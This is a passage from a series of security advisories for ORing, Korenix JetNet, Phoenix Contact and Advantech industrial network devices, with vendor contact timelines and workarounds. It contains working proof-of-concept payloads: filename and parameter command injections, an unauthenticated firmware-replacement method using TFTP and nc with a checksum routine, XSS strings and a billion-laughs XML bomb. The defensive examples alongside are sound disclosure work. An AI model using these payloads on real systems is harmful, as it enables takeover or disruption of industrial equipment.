sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&
rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&
tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&
tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&
lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&
wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&
wep_key_index=0&ret_msg=

2) Authenticated Command Injection (CVE-2024-5411)

A command can be injected in the filename of the uploaded config. By sending a request as shown below, the content of the current directory can be shown:

POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583
Content-Length: 563
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

-----------------------------347087158737672164432057801583
Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;"

-----------------------------347087158737672164432057801583
Content-Disposition: form-data; name="bt_upconf"

Upload
-----------------------------347087158737672164432057801583
Content-Disposition: form-data; name="lang"

en
-----------------------------347087158737672164432057801583
Content-Disposition: form-data; name="ret_msg_upconf"

-----------------------------347087158737672164432057801583--

This request is equal to executing “ls -la” on the console of the device.

HTTP/1.0 200 OK
tar: can't open '/tmp/test.bin': No such file or directory
drwxr-xr-x 4 root root 1024 Mar 7 14:36 .
drwxr-xr-x 8 root root 1024 Jan 30 2024 ..
-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi
-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi
-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi
-rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi
-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi
-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi
-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi
-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi
-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi
[…]

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

None

Workaround

None

Recommendation

CyberDanube recommends that ORing customers upgrade the firmware to the latest version available and restrict network access to the management interface of the device.


Contact Timeline

  • 2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.
  • 2024-02-19: Asking for an update. No reply.
  • 2024-02-28: Asking for an update. No reply.
  • 2024-03-11: Searched for “cyber security manager” on LinkedIn. Contacted him and got the answer, that the content should be sent to “support@oringnet.com”. Sent the advisory to this address directly.
  • 2024-03-20: Asking for an update. No reply.
  • 2024-04-10: Asking for an update. No reply.
  • 2024-04-30: Including support_us@oringnet.com. Asking for an update. No reply.
  • 2024-05-02: Including support_eu@oringnet.com. Asking for an update. No reply.
  • 2024-05-27: Sent information that the advisory will be published on 2024-05-28.
  • 2024-05-28: Public release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

[EN] Multiple Vulnerabilities in Korenix JetNet Series https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetnet-series/ Tue, 09 Jan 2024 09:57:47 +0000 https://cyberdanube.com/en/?p=4505

Title: Multiple Vulnerabilities
Product: Korenix JetNet Series
Vulnerable version: See "Vulnerable versions"
Fixed version: –
CVE: CVE-2023-5376, CVE-2023-5347
Impact: High
Homepage: https://www.korenix.com/
Found: 2023-08-31


The Korenix JetNet series is prone to an unauthenticated firmware upgrade, which leads to remote code execution.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

Vulnerability overview

1) TFTP Without Authentication (CVE-2023-5376)
The available tftp service is accessible without user authentication. This allows a user to upload files to and download files from the restricted "/home" folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

Proof of Concept

1) TFTP Without Authentication (CVE-2023-5376)

The Linux tftp client was used to upload a firmware to the absolute path "/home/firmware.bin":

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)

Unauthenticated attackers can exploit this by uploading malicious firmware via TFTP and initiating the upgrade process with a crafted UDP packet on port 5010.

We came to the conclusion that the firmware image consists of multiple sections. Our interpretation of these can be seen below:

class FirmwarePart:
    def __init__(self, name, offset, size):
        self.name = name      # section label
        self.offset = offset  # byte offset of the section inside the image
        self.size = size      # section length in bytes

firmware_parts = [
    FirmwarePart("uimage_header", 0x0, 0x40),
    FirmwarePart("uimage_kernel", 0x40, 0x3c54),
    FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),
    FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),
    FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),
]

The squashfs includes the rootfs. Metadata includes a 4 byte checksum which needs to be modified when repacked. During our analysis we observed that the checksum gets calculated over all sections except metadata. To test this vulnerability we reimplemented the checksum calculation at offset 0x9bdc in the binary “/bin/cmd-server2”:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Reimplementation of the checksum routine at offset 0x9bdc in
 * /bin/cmd-server2: sum every 32-bit word of the file, then subtract the
 * words of the last 4096-byte chunk again (the metadata block). */
int32_t check_file(const char* arg1) {
    FILE* r0 = fopen(arg1, "rb");

    if (!r0) {
        return 0xffffffff;
    }

    int32_t filechecksum = 0;
    int32_t last_data_size = 0;
    int32_t file_size = 0;
    uint8_t data_buf[4096];
    int32_t data_len = 1;

    while (data_len > 0) {
        data_len = (int32_t)fread(data_buf, 1, sizeof(data_buf), r0);

        if (data_len == 0) {
            break;
        }

        /* add every complete 32-bit word of this chunk (native byte order) */
        int32_t counter = 0;
        while (counter < (data_len >> 2)) {
            int32_t word;
            memcpy(&word, data_buf + (counter << 2), sizeof(word));
            counter++;
            filechecksum += word;
        }

        file_size += data_len;
        last_data_size = data_len;
    }

    fclose(r0);

    /* size sanity checks: the last chunk must be at least 0x400 bytes and
     * the data after the squashfs offset must not exceed 0x5ac000 bytes */
    if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a000) > 0x5ac000)) {
        return 0xffffffff;
    }

    /* the last chunk (metadata) is excluded from the checksum again */
    data_len = 0;
    while (data_len < (last_data_size >> 2)) {
        int32_t word;
        memcpy(&word, data_buf + (data_len << 2), sizeof(word));
        data_len++;
        filechecksum -= word;
    }

    return filechecksum;
}

int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <file_path>\n", argv[0]);
        return 1;
    }

    int32_t result = check_file(argv[1]);
    printf("0x%x\n", result);

    return 0;
}

After modifying and repacking the squashfs, we calculated the checksum, patched the required bytes in the metadata section (offset 0x11b-0x11e) and initiated the update process.
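As an added example that is not part of the advisory, the Python port below of the routine above lets an operator check whether an image is internally consistent before trusting it, and makes the defensive point plainly: a plain additive checksum only shows that nothing was corrupted, not who built the image, so a firmware acceptance path needs a signature check on top. The stored-checksum position (0x11b inside the metadata section) is taken from the text; little-endian word order and the sample image are assumptions.

```python
import struct

BLOCK_SIZE = 0x1000             # fread() chunk size used by check_file() in cmd-server2
MIN_LAST_BLOCK = 0x400          # the final chunk must be at least this long
ROOTFS_OFFSET = 0x14a000        # squashfs start, from the section table above
MAX_TAIL = 0x5ac000             # (image size - ROOTFS_OFFSET) may not exceed this
METADATA_OFFSET = 0x539000      # metadata section start, from the section table
STORED_CHECKSUM_OFFSET = 0x11b  # 4-byte checksum inside the metadata section (advisory)


def _words(chunk: bytes, fmt: str):
    """Yield the complete 32-bit words of a chunk, ignoring a trailing partial
    word exactly like the (data_len >> 2) loop in the original."""
    for (word,) in struct.iter_unpack(fmt, chunk[: len(chunk) & ~3]):
        yield word


def image_checksum(image: bytes, byteorder: str = "little") -> int:
    """Checksum as the device computes it: sum of every 32-bit word, read in
    4096-byte chunks, minus the words of the final chunk (the block that
    carries the stored checksum itself). Raises ValueError where the device
    routine returns -1. The device's native word order is not documented;
    little-endian is an assumption."""
    if not image:
        raise ValueError("empty image")
    fmt = "<I" if byteorder == "little" else ">I"
    total = 0
    last = b""
    for offset in range(0, len(image), BLOCK_SIZE):
        last = image[offset:offset + BLOCK_SIZE]
        for word in _words(last, fmt):
            total = (total + word) & 0xFFFFFFFF
    # size sanity checks carried over from the original routine
    if len(last) < MIN_LAST_BLOCK or (len(image) - ROOTFS_OFFSET) > MAX_TAIL:
        raise ValueError("image rejected by size check")
    for word in _words(last, fmt):
        total = (total - word) & 0xFFFFFFFF
    return total


def stored_checksum(image: bytes, metadata_offset: int = METADATA_OFFSET,
                    byteorder: str = "little") -> int:
    """Read the checksum the image claims for itself (assumed to be a
    native-order 32-bit value at metadata_offset + 0x11b)."""
    fmt = "<I" if byteorder == "little" else ">I"
    return struct.unpack_from(fmt, image, metadata_offset + STORED_CHECKSUM_OFFSET)[0]


def image_is_consistent(image: bytes, metadata_offset: int = METADATA_OFFSET,
                        byteorder: str = "little") -> bool:
    """True when computed and stored checksums agree. Note what this does NOT
    show: anyone can recompute the sum, so agreement says nothing about who
    produced the image. Authenticity needs a signature over the image."""
    return image_checksum(image, byteorder) == stored_checksum(image, metadata_offset, byteorder)


def build_sample_image(claimed: int) -> bytes:
    """Constructed two-block test image (not a real Korenix image): one block
    of 1024 words with value 1, then a metadata block holding the claimed
    checksum at offset 0x11b. Its true checksum is 1024."""
    payload = b"\x01\x00\x00\x00" * (BLOCK_SIZE // 4)
    meta = bytearray(BLOCK_SIZE)
    struct.pack_into("<I", meta, STORED_CHECKSUM_OFFSET, claimed)
    return payload + bytes(meta)


if __name__ == "__main__":
    good = build_sample_image(1024)
    bad = build_sample_image(1025)
    print("checksum=%08x" % image_checksum(good))
    print("good image consistent:", image_is_consistent(good, metadata_offset=BLOCK_SIZE))
    print("tampered image consistent:", image_is_consistent(bad, metadata_offset=BLOCK_SIZE))
```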

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010

The output of the serial console can be observed below:

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don't turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:

Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see “Workaround” section).

Workaround

Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

These commands deactivate the TFTP daemon on the device and thereby prevent
unauthenticated actors from abusing the service.

Recommendation

Regardless of the current state of the vulnerability, CyberDanube recommends that Korenix customers upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


Contact Timeline

  • 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 31-08-2023: Received contact information. Sent vulnerability information.
  • 26-09-2023: Asking about vulnerability status and receiving update release date.
  • 27-10-2023: Received update from contact regarding the firmware update.
  • 29-11-2023: Meeting with contact stating that it affects the whole series.
  • 31-11-2023: Meeting to discuss potential solutions.
  • 11-12-2023: Release delayed due to lack of workaround from manufacturer.
  • 21-12-2023: Manufacturer provides workaround. Release date confirmed.
  • 09-01-2024: Coordinated release of security advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

[EN] St. Pölten UAS | Multiple Vulnerabilities in Phoenix Contact TC Cloud Client, TC Router & Cloud Client https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-phoenix-contact-tc-cloud-client-tc-router-cloud-client/ Tue, 08 Aug 2023 09:52:07 +0000 https://cyberdanube.com/en/?p=4402

Title: Multiple Vulnerabilities
Product: Phoenix Contact TC Cloud Client 1002-4G*, TC Router 3002T-4G, Cloud Client 1101T-TX/TX
Vulnerable version: <2.07.2, <2.07.2, <2.06.10
Fixed version: 2.07.2, 2.07.2, 2.06.10
CVE: CVE-2023-3526, CVE-2023-3569
Impact: Medium
Homepage: https://www.phoenixcontact.com/
Found: 2023-05-04
By: A. Resanovic, S. Stockinger, T. Etzenberger

Disclaimer: This vulnerability was discovered during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and Billion laughs attack.

Vendor description

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

Vulnerable versions

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggered in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may also be stolen this way.

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

Proof of Concept

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569

The following configuration file can be used to exploit the binary "/usr/bin/xmlconfig", which supports entity reference nodes:
===============================================================================
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
===============================================================================
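The parser-side fix is to refuse entity declarations before any expansion can happen. As an added example that is not Phoenix Contact's code, the Python function below does this with the standard-library expat parser: an uploaded configuration carrying a DTD like the one above is rejected at the first <!ENTITY> declaration, while a plain configuration still parses. The element names, the size limit and the shortened payload are constructed for the demonstration.

```python
import xml.parsers.expat

MAX_CONFIG_BYTES = 64 * 1024   # assumed upper bound for a device configuration upload


class UnsafeConfig(ValueError):
    """Raised when an upload tries to use DTD features a configuration never needs."""


def parse_config(xml_bytes: bytes, max_bytes: int = MAX_CONFIG_BYTES):
    """Parse an uploaded configuration with expat while refusing every entity
    declaration and every external entity reference. Because the refusal
    happens in the declaration callback, the lol1..lol9 chain above is
    stopped at '<!ENTITY lol "lol">', before a single expansion is made.
    Returns (element names in document order, concatenated text)."""
    if len(xml_bytes) > max_bytes:
        raise UnsafeConfig("configuration larger than %d bytes" % max_bytes)

    parser = xml.parsers.expat.ParserCreate()

    def forbid_entity_decl(name, is_parameter_entity, value, base,
                           system_id, public_id, notation_name):
        raise UnsafeConfig("entity declaration %r is not allowed" % name)

    def forbid_external_entity(context, base, system_id, public_id):
        raise UnsafeConfig("external entity reference is not allowed")

    elements, text = [], []
    parser.EntityDeclHandler = forbid_entity_decl
    parser.ExternalEntityRefHandler = forbid_external_entity
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)   # an exception raised in a handler propagates from here
    return elements, "".join(text)


# Constructed benign configuration (not a real device configuration format).
BENIGN_CONFIG = b"""<?xml version="1.0"?>
<config><hostname>tc-router-1</hostname><ntp>pool.ntp.org</ntp></config>"""

# Constructed, shortened variant of the advisory's payload (three levels instead of nine).
LAUGHS_CONFIG = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""


def classify(xml_bytes: bytes) -> str:
    """Return 'accepted' or 'rejected: <reason>' for an upload."""
    try:
        parse_config(xml_bytes)
        return "accepted"
    except UnsafeConfig as exc:
        return "rejected: %s" % exc


if __name__ == "__main__":
    print(classify(BENIGN_CONFIG))
    print(classify(LAUGHS_CONFIG))
```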

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update to the latest available firmware version.

Workaround

None.

Recommendation

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
  • 2023-05-17: Vendor informed internal product team.
  • 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
  • 2023-05-19: Vendor needs more time to fix the issues.
  • 2023-06-15: Vendor asked for an explanation of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
    Offered an MS Teams call to clarify the issues.
  • 2023-06-16: Scheduled a call for 2023-06-19.
  • 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
  • 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
  • 2023-07-13: Received CVE numbers from vendor.
  • 2023-07-18: Received firmware versions from vendor.
  • 2023-07-23: Vendor released firmwares.
  • 2023-08-08: Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

[EN] St. Pölten UAS | Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/ Tue, 08 Aug 2023 09:51:34 +0000 https://cyberdanube.com/en/?p=4397

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203)
Fixed version: 1.26
CVE: CVE-2023-4202, CVE-2023-4203
Impact: Medium
Homepage: https://advantech.com
Found: 2023-05-04
By: R. Haas, A. Resanovic, T. Etzenberger, M. Bineder

Disclaimer: This vulnerability was discovered during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Advantech EKI-1524/1522/1521 devices are prone to multiple Stored Cross-Site Scripting (XSS).

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21 (CVE-2023-4202)
EKI-1522-CE series / 1.21 (CVE-2023-4202)
EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203)
EKI-1522-CE series / 1.24 (CVE-2023-4203)
EKI-1521-CE series / 1.24 (CVE-2023-4203)

Vulnerability overview

1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)
Two stored cross-site scripting vulnerabilities have been identified in the firmware of the device. The first XSS was identified in the "Device Name" field and the second XSS was found in the "Ping" tool. This can be exploited in the context of a victim’s session.

Proof of Concept

1) Stored Cross-Site Scripting (XSS)

Both cross-site scripting vulnerabilities are permanently affecting the device.

1.1) Stored XSS in Device Name CVE-2023-4202

The first vulnerability can be triggered by setting the device name
("System->Device Name") to the following value:

"><script>alert("document.cookie")</script>

This code prints out the cached cookies to the screen.

1.2) Stored XSS in Ping Function CVE-2023-4203

The second XSS vulnerability can be found in “Tools->Ping”. The following GET request prints the current cached cookies of a user’s session to the screen.

http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513

An alternative to the used payload is using "onmouseover" event tags. In this case it prints out the number "1337": " onmousemove="alert(1337)

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Upgrade to the newest available firmware.

Workaround

None.

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-05-16: Contacting vendor via security contact.
  • 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.
    The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue.
  • 2023-05-25: Contact stated that new firmware should resolve the issue.
  • 2023-06-03: Sent new payload to the vendor.
  • 2023-06-05: Vendor asked for clarification; Sent further explanation to the contact; Vendor contact said he knows a solution.
  • 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues.
  • 2023-06-27: Asked for the release date.
  • 2023-07-04: Contact stated, that they are currently doing QA tests.
  • 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published.
  • 2023-07-17: Assigned CVE numbers for the issues. Asked for an update.
  • 2023-07-18: Vendor contact stated that the firmware will be released end of July.
  • 2023-08-07: Asked contact for the new firmware version.
  • 2023-08-08: Received version 1.26 as the official released firmware with fixes.
    Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

[EN] Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/ Wed, 10 May 2023 19:35:21 +0000 https://cyberdanube.com/en/?p=4383

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: 1.21
Fixed version: 1.24
CVE: CVE-2023-2573, CVE-2023-2574, CVE-2023-2575
Impact: High
Homepage: https://advantech.com
Found: 2023-03-06


Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input length validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands into the system, which get executed with root permissions in the background.

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)

The following POST request executes the command ";ping 10.0.0.1" on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

